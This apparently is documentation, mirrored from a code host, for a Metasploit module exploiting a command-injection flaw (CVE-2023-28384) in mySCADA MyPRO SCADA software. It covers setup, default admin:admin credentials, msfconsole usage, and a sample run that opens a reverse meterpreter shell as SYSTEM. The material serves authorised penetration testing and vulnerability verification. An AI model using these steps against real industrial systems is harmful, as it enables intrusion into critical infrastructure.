adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

80 lines
2.9 KiB
Markdown
Raw Blame History

## Vulnerable Application
**Vulnerability Description**
This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
`NT AUTHORITY\SYSTEM`.
This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.
Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover
the security issues. The official changelog for the updated version, v8.29.0, is available
[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a
"General security improvement" without further details.
**Vulnerable Application Installation**
A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface
(navigate to System > Storage).
**Successfully tested on**
- mySCADA MyPRO 8.28.0 on Windows 10 22H2
- mySCADA MyPRO 8.27.0 on Windows 10 22H2
- mySCADA MyPRO 8.26.0 on Windows 10 22H2
## Verification Steps
1. Install the application
2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)
3. Start `msfconsole` and run the following commands:
```
msf > use exploit/windows/scada/mypro_cmdexe
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
msf exploit(windows/scada/mypro_cmdexe) > exploit
```
You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
## Options
### USERNAME
The username of a MyPRO user (default: admin)
### PASSWORD
The associated password of the MyPRO user (default: admin)
## Scenarios
Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
following:
```
msf exploit(windows/scada/mypro_cmdexe) > exploit
[*] Started reverse TCP handler on 192.168.1.241:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Checking credentials...
[+] Credentials are working.
[*] Sending command injection...
[*] Sending stage (201798 bytes) to 192.168.1.239
[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
[*] Exploit finished, check thy shell.
meterpreter > shell
Process 2632 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
```
Reference in New Issue View Git Blame Copy Permalink